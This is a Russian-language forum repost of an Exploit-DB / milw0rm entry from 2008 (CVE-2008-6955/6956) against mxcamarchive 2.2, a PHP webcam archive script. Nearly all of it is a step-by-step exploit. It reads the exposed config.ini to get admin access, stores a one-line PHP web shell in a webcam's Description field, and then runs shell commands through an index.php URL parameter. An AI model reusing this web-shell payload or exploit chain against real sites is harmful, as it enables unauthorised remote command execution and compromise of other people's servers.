- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7136
- Проверка EDB
-
- Пройдено
- Автор
- AHMADBADY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6956 cve-2008-6955
- Дата публикации
- 2008-11-17
Код:
************************(Bypass Config Download Vulnerability)*****************
script: mxcamarchive 2.2
***************************************************************************
download from:http://www.infireal.com/media/serve/106/mxcamarchive2.2.zip
***************************************************************************
...........................................................................
expl:
http://site.com/path/archive/config.ini
and login
http://site.com/path/admin
and add new web cam
and Description '<pre><?@system($_REQUEST["h"]);?></body></pre>'
and save
now:
http://site.com/path/index.php?h=ls -la
***************************************************
***************************************************
Author: ahmadbady from http://www.deltahacking.net
my mail: [email protected]
***************************************************
# milw0rm.com [2008-11-17]- Источник
- www.exploit-db.com
